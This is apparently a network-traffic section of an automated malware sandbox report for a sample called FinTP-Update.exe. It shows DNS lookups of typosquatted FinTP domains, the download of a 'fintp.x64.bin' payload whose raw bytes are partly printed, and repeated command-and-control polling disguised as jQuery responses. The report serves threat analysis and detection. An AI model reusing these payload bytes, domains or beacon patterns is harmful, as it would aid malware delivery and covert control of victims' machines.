                                                                                                                            Dec 19, 2024 23:14:11.708400011 CET443500073.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:14:11.708460093 CET443500073.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:14:11.708535910 CET50007443192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:14:11.708535910 CET50007443192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:14:11.708609104 CET443500073.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:14:11.708667040 CET443500073.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:14:11.708734035 CET50007443192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:14:11.709266901 CET50007443192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:14:11.709300995 CET443500073.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:14:11.709328890 CET50007443192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:14:11.709367990 CET50007443192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:14:11.898448944 CET50014443192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:14:11.898484945 CET443500143.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:14:11.898562908 CET50014443192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:14:11.898900986 CET50014443192.168.2.53.79.209.76
                                                                                                                            Dec 19, 2024 23:14:11.898920059 CET443500143.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:14:13.284307003 CET443500143.79.209.76192.168.2.5
                                                                                                                            Dec 19, 2024 23:14:13.284359932 CET50014443192.168.2.53.79.209.76

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 19, 2024 23:12:08.414041996 CET5786053192.168.2.51.1.1.1
                                                                                                                            Dec 19, 2024 23:12:09.231911898 CET53578601.1.1.1192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:12.103962898 CET6100053192.168.2.51.1.1.1
                                                                                                                            Dec 19, 2024 23:12:12.243721008 CET53610001.1.1.1192.168.2.5
                                                                                                                            Dec 19, 2024 23:12:14.479068041 CET5392353192.168.2.51.1.1.1
                                                                                                                            Dec 19, 2024 23:12:15.191356897 CET53539231.1.1.1192.168.2.5

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Dec 19, 2024 23:12:08.414041996 CET192.168.2.51.1.1.10xd17fStandard query (0)www.flntp.roA (IP address)IN (0x0001)false
                                                                                                                            Dec 19, 2024 23:12:12.103962898 CET192.168.2.51.1.1.10x5ed8Standard query (0)www.flntp.roA (IP address)IN (0x0001)false
                                                                                                                            Dec 19, 2024 23:12:14.479068041 CET192.168.2.51.1.1.10x47b6Standard query (0)www.finttp.roA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Dec 19, 2024 23:12:09.231911898 CET1.1.1.1192.168.2.50xd17fNo error (0)www.flntp.roec2-3-79-209-76.eu-central-1.compute.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 19, 2024 23:12:09.231911898 CET1.1.1.1192.168.2.50xd17fNo error (0)ec2-3-79-209-76.eu-central-1.compute.amazonaws.com3.79.209.76A (IP address)IN (0x0001)false
                                                                                                                            Dec 19, 2024 23:12:12.243721008 CET1.1.1.1192.168.2.50x5ed8No error (0)www.flntp.roec2-3-79-209-76.eu-central-1.compute.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 19, 2024 23:12:12.243721008 CET1.1.1.1192.168.2.50x5ed8No error (0)ec2-3-79-209-76.eu-central-1.compute.amazonaws.com3.79.209.76A (IP address)IN (0x0001)false
                                                                                                                            Dec 19, 2024 23:12:15.191356897 CET1.1.1.1192.168.2.50x47b6No error (0)www.finttp.roec2-3-79-209-76.eu-central-1.compute.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 19, 2024 23:12:15.191356897 CET1.1.1.1192.168.2.50x47b6No error (0)ec2-3-79-209-76.eu-central-1.compute.amazonaws.com3.79.209.76A (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • www.flntp.ro

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.5497043.79.209.76801276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 19, 2024 23:12:09.537360907 CET51OUTGET /fintp.x64.bin HTTP/1.0
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Dec 19, 2024 23:12:10.800759077 CET1236INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:10 GMT
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            Content-Length: 342537
                                                                                                                            Last-Modified: Wed, 09 Oct 2024 08:15:21 GMT
                                                                                                                            Connection: close
                                                                                                                            ETag: "67063b99-53a09"
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Data Raw: 90 90 90 90 90 90 90 90 90 4d 5a 41 52 55 48 89 e5 48 81 ec 20 00 00 00 48 8d 1d ea ff ff ff 48 89 df 48 81 c3 4c b3 01 00 ff d3 41 b8 f0 b5 a2 56 68 04 00 00 00 5a 48 89 f9 ff d0 00 00 00 00 00 00 00 00 00 f0 00 00 00 be d5 68 37 ea 60 eb f4 48 f2 1d 86 ca 07 12 d7 5f cb a0 4e 4c a6 5b f6 88 3f e5 f0 eb 7c 4e e6 94 35 17 99 af 79 b3 f7 c0 6f 5e 32 ab b9 53 50 2f 7f eb 24 f6 92 8d 4c 90 22 a6 62 f1 7b 85 a8 2d d9 a0 4b cc 65 c9 1c c6 bb da 9e b0 63 46 2e d2 ce 35 05 f8 8c dd bd 26 8e 11 e7 5a 40 77 f7 12 78 de 5e f5 16 95 b5 6e 6e 2d 4c 97 41 99 3c 33 ee 44 9b c1 87 7c 1d 94 f2 5c bc 32 ff 15 22 af e6 49 8a f5 a3 3c 8d 51 e1 a6 ec 53 8c eb 9a 5e 98 79 71 15 59 6e 8f e2 95 4f 7f f3 09 2a ca d4 4e 07 fb 29 57 54 01 0d 5c 4a 72 8b 6c 93 2d 4e 4f 00 00 64 86 05 00 40 44 25 58 00 00 00 00 15 e1 77 76 f0 00 23 30 0b 02 0b 00 00 46 03 00 00 9a 02 00 00 00 00 00 c0 ed 09 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 20 47 00 00 04 00 00 00 [TRUNCATED]
                                                                                                                            Data Ascii: MZARUHH HHHLAVhZHh7`H_NL[?|N5yo^2SP/$L"b{-KecF.5&Z@wx^nn-LA<3D|\2"I<QS^yqYnO*N)WT\Jrl-NOd@D%Xwv#0F G`Th ^RdIdd&*p`x;aPEF `;awr`J@@;t_`J@;awd&(@@;zw (@BPdA/a2ic5G"P`D0q=YO$_\iF {mKcY;:xS'hley3Z3 `^POK;a<{DW/w/(PZ`H ,?;_c!c:1'l,`BByz[9_t__Q.L<[^v
                                                                                                                            Dec 19, 2024 23:12:10.800867081 CET1236INData Raw: d0 4c c4 f1 cb 93 ee fa 45 62 0e 05 20 11 fe 2f 5a 4e 8e 3a d7 ed 52 35 57 a5 41 72 da 72 54 ee 97 4b 92 62 76 c7 8a d5 70 ab 10 9f 92 61 8e 3b f8 f5 64 1d f8 4e aa 00 00 00 00 5d 6a b3 3e 9c b9 7f 3e 9c 89 67 3e 9c 91 6f 3e 9c 99 57 33 26 3a 32
                                                                                                                            Data Ascii: LEb /ZN:R5WArrTKbvpa;dN]j>>g>o>W3&:2EEwvdy`wv3{sv{wv7qy QOTlslTvBg5u7#z7*zujPE>$Lgb`|2>S~
                                                                                                                            Dec 19, 2024 23:12:10.800889015 CET1236INData Raw: 6a b7 f3 c7 ee f2 b7 15 e1 77 80 d4 e2 78 f3 ad e1 77 76 5c 82 76 3a 98 c4 ad 16 10 e1 3f 1f d5 51 77 76 15 af fc 22 35 81 3a f3 c7 95 69 3f 98 60 ff 76 15 e1 3f fd c2 a9 fc bb 5c 62 b6 7e 5d 68 33 52 35 a0 88 a4 fc 65 77 76 15 64 81 02 62 ac fa
                                                                                                                            Data Ascii: jwxwv\v:?Qwv"5:i?`v?\b~]h3R5ewvdbk:$>\Tj3~br$?\L%>v;iwv\j>|!v5A_ME$rk;Y7#s?$ri?^?ut>&!swv*1?y/>S]jR}%(7K+U"
                                                                                                                            Dec 19, 2024 23:12:10.801400900 CET1236INData Raw: 6a b1 3e 9e bd 53 26 5d 6a 1b 52 4d a9 fc 02 31 81 3f f5 d1 c1 36 29 54 bf 36 2b 54 bd 28 b5 5d 6a b3 3e 9c b9 7f 3e 9c 89 67 3e 9c 91 6f 3e 9c 99 57 37 43 a9 f4 9a 25 a9 14 8f 5c 6a 86 37 9e 09 fc b9 59 6a 85 9e 71 c6 77 76 90 21 78 f3 8b e1 77
                                                                                                                            Data Ascii: j>S&]jRM1?6)T6+T(]j>>g>o>W7C%\j7Yjqwv!xwv]j:I?9:Q>SQj;Ru]h3R=21\j>SVTtXvK7w>9?rV<Qj;']jwv`3Q>7?qQ!bYj3Re"1?iQ]juv&?
                                                                                                                            Dec 19, 2024 23:12:10.801418066 CET896INData Raw: a4 a7 45 ce 26 32 8e 11 e1 77 76 5d 68 02 76 5d 26 32 7e 15 61 77 76 d2 a5 53 56 14 e1 77 76 fd ca 5c 76 15 64 b7 79 90 7e 77 76 15 6a 32 7e 9e 32 fc bd 51 6a a4 f3 d5 95 5d 3a 9e 2f 33 fd cd a0 78 c0 14 e2 be 89 d7 ea bf f5 ef e9 02 7b 54 6a b5
                                                                                                                            Data Ascii: E&2wv]hv]&2~awvSVwv\vdy~wvj2~2Qj]:/3x{TjG\3*1?I?>S6]h3R-pTXvv21vv67S^wv]h3R5Y?j}uvukQ]juv\jq>SNTXvv?IG752T>*
                                                                                                                            Dec 19, 2024 23:12:10.801434040 CET1236INData Raw: 0b 7d b7 dc f2 b6 be 04 d2 bf 45 df a5 74 b7 50 e2 36 b2 50 e2 36 9e 50 68 36 72 5c 1e bd 03 ae a5 fc 02 31 f9 fc 2a 31 c9 33 fd 59 c5 47 32 9e b5 53 5a 9e 95 53 6a 9e 9d 53 56 51 6a 33 52 21 a5 fc 2a 31 c5 36 fd c4 a0 44 a4 54 60 b7 ee 3a 6b 35
                                                                                                                            Data Ascii: }EtP6P6Ph6r\1*13YG2SZSjSVQj3R!*16DT`:k5 o62)|7&02 p&)6;RUQ7/3u396&26U tQ7&3T}Q7*2u@)|3.7"67&t:1tTj7.tQUtTj
                                                                                                                            Dec 19, 2024 23:12:10.802160978 CET1236INData Raw: 20 bc 60 54 6a b1 b7 dd e7 44 be 9e 22 74 3a 31 91 74 a7 54 6a bd 7d de 20 bf 7b 51 e2 b5 32 26 39 36 55 dc a4 74 8e 9e 22 fc a0 d4 29 75 37 26 37 33 45 cd a0 54 a1 54 6a b5 55 d6 d2 a1 7d dd a0 fc b1 51 e2 ae 37 9e 2e b6 be 1e a4 74 ae 51 6c f0
                                                                                                                            Data Ascii: `TjD"t:1tTj} {Q2&96Ut")u7&73ETTjU}Q7.tQl?DTj77";Ra62#|T3)6T7607&76}6tQl=7 uYutP76TT6}D6*)uE
                                                                                                                            Dec 19, 2024 23:12:10.802179098 CET1236INData Raw: 6a b9 32 26 29 33 75 d7 a0 7c b9 36 2f 36 75 ed a0 fc b1 54 6a a4 45 c6 c2 a0 b7 dd e3 33 45 dd d2 a4 37 9e 27 36 55 d2 ea bf fd d2 a5 74 bf 9e 2e 32 75 dd a4 fa f4 dd c6 74 c6 d4 29 7c 33 9e 30 b6 bf 0c d2 bf fd d2 a0 b6 bc 03 20 bf 70 26 29 36
                                                                                                                            Data Ascii: j2&)3u|6/6uTjE3E7'6Ut.2ut)|30 p&)6:06t)z2&16 tQ7(6uTETU7&2QP3&/)qE*auXMt)z7(DT2#6UtTj767ET}86tPl
                                                                                                                            Dec 19, 2024 23:12:10.802194118 CET1236INData Raw: 26 7c be 16 10 36 fd df a0 74 86 d4 28 6e 37 9e 36 32 fb 93 64 5b 04 87 a0 44 a7 54 6a b5 32 9e 17 36 55 c7 20 bf 7d 26 29 36 45 c2 a0 b6 b8 03 a0 fc b4 d4 29 71 45 dd 6a b1 75 58 3d 74 a7 9e 2e 7c b8 d4 29 7a 32 16 23 33 45 e5 a0 54 bd 54 e2 af
                                                                                                                            Data Ascii: &|6t(n762d[DTj26U }&)6E)qEjuX=t.|)z2#3ETT)u7&33E7&0|"3uj2u(nEj37'6t;Q2#6}396&26U tQ7&3T}Q7*2u^m(nDTjDut
                                                                                                                            Dec 19, 2024 23:12:10.802862883 CET1236INData Raw: 6a b9 37 16 39 b6 bf 0c a4 fa f5 a6 ed 6b 4f 26 29 36 fd d3 a5 fc ad d4 29 71 45 dd 6a b4 37 d4 2a 61 75 58 f1 74 a7 d4 29 7a 37 9e 2b 33 45 cd a5 74 b4 1e 2a 32 75 ed a0 54 bf 9e 22 b6 be 17 a5 44 ae 54 6a b5 55 d6 ea bf 37 9e 26 33 75 cc 20 bf
                                                                                                                            Data Ascii: j79kO&)6)qEj7*auXt)z7+3Et*2uT"DTjU7&3u }Tj39&)2EP3P3E=tTj7-a2 3u {Q7"DP7*6}T7&6|T7 tT36Z+-PjDTj7,aDTjuXtTj7-
                                                                                                                            Dec 19, 2024 23:12:10.920595884 CET1236INData Raw: 9a 3f 3f 9e 02 36 29 54 bf 36 2b 54 bd 2a b5 96 80 5f 76 5d 62 56 76 26 21 b0 37 1d 86 91 7f 7f 26 36 7a 90 4f 10 cd d2 a0 67 04 e6 8f 4b b1 54 f5 4d 83 5a 44 b0 37 0d 9e 25 78 44 26 36 6a 99 89 72 ed d2 a0 57 dd cc 62 68 b1 54 c5 6e bb f5 ba b4
                                                                                                                            Data Ascii: ??6)T6+T*_v]bVv&!7&6zOgKTMZD7%xD&6jrWbhTn]j>>g>o>W7C5b^UYj>|wvv2kw1b6g>dwpwv\b6$Yj1^wv89^\jM5]2&w^Y]b^Um>[>/o


                                                                                                                            HTTPS Proxied Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.5497053.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:13 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:14 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:14 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:14 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.5497063.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:16 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:17 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:17 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:17 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.5497073.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:18 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:19 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:19 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5713
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:19 UTC5713INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.5497083.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:21 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:21 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:21 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5628
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:21 UTC5628INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.5497103.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:23 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Cookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLw
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Cache-Control: no-cache
                                                                                                                            2024-12-19 22:12:23 UTC235INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.24.0 (Ubuntu)
                                                                                                                            Date: Thu, 19 Dec 2024 22:12:23 GMT
                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                            Content-Length: 5671
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0, no-cache
                                                                                                                            Pragma: no-cache
                                                                                                                            2024-12-19 22:12:23 UTC5671INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 33 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
                                                                                                                            Data Ascii: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.5497173.79.209.764431276C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-19 22:12:25 UTC485OUTGET /rss/portallogin-gettask.html HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Host: www.flntp.ro
